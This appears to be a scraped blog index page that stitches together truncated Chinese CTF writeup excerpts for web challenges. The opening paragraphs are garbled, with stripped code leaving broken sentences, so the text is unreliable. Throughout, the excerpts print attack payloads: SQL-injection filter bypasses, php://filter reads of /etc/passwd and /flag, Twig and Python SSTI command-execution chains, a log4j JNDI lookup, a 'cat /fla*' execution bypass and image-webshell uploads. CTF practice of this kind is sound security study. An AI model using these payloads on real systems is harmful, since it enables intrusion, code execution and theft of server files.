末初 · mochu7

BUUCTF：[MRCTF2020]套娃 Writeup

BUUCTF：[GYCTF2020]FlaskApp Writeup

运行之后在响应头反馈了访问URL。在当前目录的上一级发现flag。访问即可发现成功执行。

的很多字符经过这样的一番编码处理都可以得到正常的字母，脚本fuzz。然后是找flag位置，比较无语的是的flag位置在。的配置文件网上位置有很多，这里能读取到的是。参数的处理过程如下图所示。

注意到了banner中信息说是。

字段中(内容比较长，等待时间需要久一点，因为BUU发包太快会直接ban掉，就加个。测起来有点感觉过滤很奇怪。

登录注册、在测试的时候发现发布中的广告名如果输入一些敏感关键字，例如。但是因为没有字段信息可以查，使用无列名注入直接查内容。然后再之后的对广告名的fuzz测试中发现以下过滤。猜测广告名存在注入，尝试在广告名处输入单引号。，发布的时候并没有任何反应，发布后有个。尝试联合查询、首先需要判断有多少字段，直接报错了，基本确定广告名存在。无法注释就尝试构造闭合。可以查看发布的广告。查表明，因为这里过滤。

是可以执行的，可以先上线一个shell，然后在服务器中检查使用其他参数的结果。会将执行语句记录输出文件。控制输出文件内容以及文件格式就可以解析了。的文件无法写入，尝试写入一些可能会解析的其他文件后缀。使用输出格式可以将指定的内容输出到指定的文件格式。对传入的参数的保护(感觉有点点猜的意思。但是这里还有些过滤，比如过滤了关键字。会把扫描结果导出到一个文件里面。题目环境经过测试可以发现只有。，那说明导出的文件格式是。即便执行失败也无所谓，

过滤了小括号基本上就没法使用各种类的方法了，而这里。在环境变量中，这里的过滤只针对。方法，可以直接查看到当前。

的触发条件是把实例对象当作方法调用。很明显，如果把实例对象赋给。的触发条件是调用不可访问的属性或者方法，能做到的只有。是有办法通过php伪协议读取到。在当前目录，而整个题目只有。限定了形参为字符型，如果。

最笨的办法，比较慢，需要多等一会，追求效率可以使用二分法。把注释符号都过滤了，可以使用闭合的方法构造注入，空格使用。根据输入框的提示传入。

首先在下发现访问有一个假的flag，但是在响应头中找到一个提示，另外还有一个值得注意的是这里是访问得到PHP5中的函数中科学计数法符号无效，只会当作正常字符处理所以这里利用科学计数法的符号就可以绕过level 1level 2直接可参考我的这篇文章：浅谈PHP中哈希比较缺陷问题及哈希强比较相关问题最后直接绕过和即可...

文章目录WEBphpdestMISCWelcome to fxxking DestCTFPngeniusEasyEncodeStrangeTrafficcodegameWEBphpdestphp源码分析 require_once 绕过不能重复包含文件的限制：https://www.anquanke.com/post/id/213235payload?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/se

一个师傅给的源码，来源不知，就当作小练习记录一下<?phperror_reporting(0);class Vox{ protected $headset; public $sound; public function fun($pulse){ include($pulse); } public function __invoke(){ $this->fun($this->headset); }}.

https://buuoj.cn/challenges#[%E5%AE%89%E6%B4%B5%E6%9D%AF%202019]easy_serialize_php访问/index.php?f=highlight_file得到源码 <?php$function = @$_GET['f'];function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'

文章目录Level - Week1WEBMISC欢迎欢迎！热烈欢迎！这个压缩包有点麻烦好康的流量群青(其实是幽灵东京）CRYPTO新人赛，就没有存题目附件了，简单的记录一下解题过程吧Level - Week1WEBMISC欢迎欢迎！热烈欢迎！hgame{We1com3_t0_HG@ME_2O22}这个压缩包有点麻烦README.txtI don't know if it's a good idea to write down all the passwords.将pa

文章目录Digital Souvenirlog4flagBe-a-Database-Hackerthe Secrets of Memorybaby flaglabFlag ConsoleBe-a-Database-Hacker 2Java Remote DebuggerDigital Souvenirrwctf{RealWorldIsAwesome}log4flag有一些正则过滤网上bypass方法很多，随便找一个就行${${::-j}ndi:${lower:rmi}://vw3nw

长安战疫Writeup

文章目录MISC-CheckinMISC-SurveyMISC-HearingNotBelievingMISC-frequentlyWEB-double sqliMISC-CheckinByteCTF{Empower_Security_Enrich_Life}MISC-SurveyByteCTF{h0p3_y0u_Enjoy_our_ch4ll3n9es!}MISC-HearingNotBelievinghearing.wav使用Audacity打开，查看频谱图在开头发现二维码碎

来源于今天一位朋友叫我帮忙看的题目查看源码发现提示存在过滤且，limit参数只能为单个数字fuzz一下sql注入关键字看看都过滤了哪些字符直接在class参数插入exp(100)回显正常，插入exp(1000)发现返回database error；说明此处sql注入可直接插入执行，其次如果sql语句执行错误会返回报错提示；那么就可以做布尔盲注了，但是比较棘手的是过滤了逗号,；不能使用if进行条件判断；绕过逗号的方法from x for y不能在if中使用。if无法使用可以用c.

文章目录WebEasyPHPfunny_gameadminloginSellSystemMiscWebEasyPHPfunny_game保存下载页面后，在index.js中发现一个win()函数把内容拿出来放到控制台直接执行var _0x46ec=['PD4d','w7Nbwoh1w6IWw6gMwovDr8OFTFHCq8OWwrLDrwQMwrnClEcbw5LCm2DCuEU1wopOw5HDlMOqw4MCcQMmWg=='];var _0x1409=function(_0

文章目录MISC签到alpha10BabyMimuzikoWEBWebFTPPNG图片转换器pklovecloudEasyCleanupyet_another_mysql_injectionMISC签到flag{welcometo5space}alpha10BabyMimuzikoWEBWebFTP目录扫描发现git泄露使用GitHack尝试还原代码发现无法还原源代码，但是发现了几个可以正常访问的文件，其中最为有用的就是这个探针：/Readme/mytz.php

https://buuoj.cn/challenges#[BJDCTF2020]Cookie%20is%20so%20stable题目名称和hint都提示注意Cookie在flag.php页面中提交一个ID后回显在页面上，猜测是PHP的模板注入试了几种标签测试方法，发现只有Twig的标签测试能成功执行，那就应该是Twig的模板了网上找Twig模板注入的Payload{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.

https://buuoj.cn/challenges#[ASIS%202019]Unicorn%20shop

文章目录WEB[强网先锋]赌徒MISCWEB[强网先锋]赌徒目录扫描发现www.zip下载得到源码index.php<meta charset="utf-8"><?php//hint is in hint.phperror_reporting(1);class Start{ public $name='guest'; public $flag='syst3m("cat 127.0.0.1/etc/hint");'; public f

http://www.bmzclub.cn/challenges#file-vault这是一道很好反序列化字符串溢出的题目，首先打开容器看到这是一个上传点先进行目录扫描，发现存在vim的备份文件index.php~查看index.php~得到源码如下<?phperror_reporting(0);include('secret.php');$sandbox_dir = 'sandbox/'.sha1($_SERVER['REMOTE_ADDR']);global $sand

文章目录MISC签到colorful codeWEBfind_itframeworkWebsiteMangerezlight记录一下被锤爆的一天…orzMISC签到签到抢了个二血2333，第一次拿二血呜呜呜，虽然是签到，还是很激动。附件名称叫EBCDIC.zip010Editor直接选择EBCDIC编码flag{we1c0me_t0_redhat2021}colorful codeWEBfind_it目录扫描发现robots.txt存在1ndexx.php，直接访问并

http://www.bmzclub.cn/challenges#%E6%B5%81%E9%87%8F%E7%9B%91%E6%8E%A7%E5%B9%B3%E5%8F%B0通过枚举可知存在admin用户，当uname=admin时，发现提示密码错误，当uname!=admin时提示用户名错误。另外存在过滤SQL关键字符简单fuzz一下过滤了哪些字符首先注释无法使用，可以通过构造字符闭合来绕过空格及内联注释也无法使用，可以利用()绕过and、or、&、|都被过滤，可以使

http://www.bmzclub.cn/challenges#just_play打开是个小游戏，保存源码本地修改参数赢得比赛后发现没啥信息。继续观察发现http://www.bmzclub.cn:20351/js/[ahxinb]{2}ctf[0-9]{2}.js使用Python简单爆破下这个正则的所有匹配项from requests import *#http://www.bmzclub.cn:20351/js/[ahxinb]{2}ctf[0-9]{2}.jsurl = 'h

http://www.bmzclub.cn/challenges#baby_sql简单的SQL注入，过滤了一些关键字符，但是过滤进制都是直接替换为空。有机可趁，直接双写绕过/check.php?username=mochu7'oorrder/**/bbyy/**/4%23&password=mochu7/check.php?username=mochu7'uniunionon/**/selselectect/**/1,2,3%23&password=mochu7/chec

http://www.bmzclub.cn/challenges#e题目名称是e，站点功能字符串的搜索和替换，可以使用正则语法，很容易联想到preg_replace()+/e的代码执行

http://www.bmzclub.cn/challenges#upload-double/inc.php?inc=upload.php疑似存在文件包含，文件上传后缀被控制的无法绕过，上传图片马然后，尝试包含图片马成功包含了，但是好像执行并没有效果下载上传到服务器上的图片，发现木马的内容不见了，判断这里应该是对上传的图片进行了二次渲染，木马内容被渲染后去除了要使图片马有效，就得将木马内容写在不会被二次渲染的区域，搜索引擎找到个脚本可以将木马内容放在不会被渲染的区域，并且能够成功上传&

http://www.bmzclub.cn/challenges#sqlii回显了User-Agent、IP、uname数据，猜测讲这些数据插入了数据库然后查询返回，结合上图别打头，猜测就是User-Agent注入User-Agent: 'order by 5#很明显存在注入，接着就是fuzz，测试的过程中发现过滤了selectdeletedropinsertalterwhereprepareset.......并且发现存在堆叠注入User-Agent: ';sho

http://www.bmzclub.cn/challenges#pimps疑似文件包含点，尝试伪协议读取源码/?op=php://filter/convert.base64-encode/resource=indexindex.php<?phperror_reporting(0);define('FROM_INDEX', 1);$op = empty($_GET['op']) ? 'home' : $_GET['op'];if(!is_string($op) || pr

http://www.bmzclub.cn/challenges#%E4%B8%AA%E4%BA%BA%E6%89%80%E5%BE%97%E7%A8%8E很明显是SSTI，但是{{''.__class__.__mro__[1].__subclasses__()}}没有成功返回所有子类猜测()被过滤了，但是并不是检测到过滤字符就die，而是像是被替换为了空。所以利用双写试试{{''.__class__.__mro__[1].__subclasses__(())}}直接找os._wrap

http://www.bmzclub.cn/challenges#Blog目录扫描扫到一个www.rar，查看源码发现./www/key/key.php存在代码执行很简单的绕过，直接参考我的这篇文章：浅谈PHP代码执行中出现过滤限制的绕过执行方法/key/key.php?c=(sys.tem)("ls -lha /;cat /fla*");...

http://www.bmzclub.cn/challenges#SimpleCalculator测试了下发现除数学相关的一些关键字之外，其他的字母都会被过滤。长度限制80。异或、取反都可以执行，猜测这里最后使用的eval()对经过过滤字符进行了代码执行，代码执行的绕过在我之前的博客讲过：浅谈PHP代码执行中出现过滤限制的绕过执行方法这里利用取反绕过即可PS C:\Users\Administrator> php -r "var_dump(urlencode(~'phpinfo'));"

http://www.bmzclub.cn/challenges#Bestphpindex.php<?php highlight_file(__FILE__); error_reporting(0); ini_set('open_basedir', '/var/www/html:/tmp'); $file = 'function.php'; $func = isset($_GET['function'])?$_GET['function']:'filte

http://www.bmzclub.cn/challenges#zonghe看到这个，直接尝试可不可以伪协议读取本地文件/file.php?file=php://filter/convert.base64-encode/resource=/etc/passwd/file.php?file=php://filter/convert.base64-encode/resource=/flag>>> from base64 import *>>> b64

http://www.bmzclub.cn/challenges#up什么也没有目录扫描一下访问upload.html，发现文件上传点上传之后会返回上传文件的一些信息访问upload/1.jpg，发现jpg直接被当作php来解析了直接上传图片马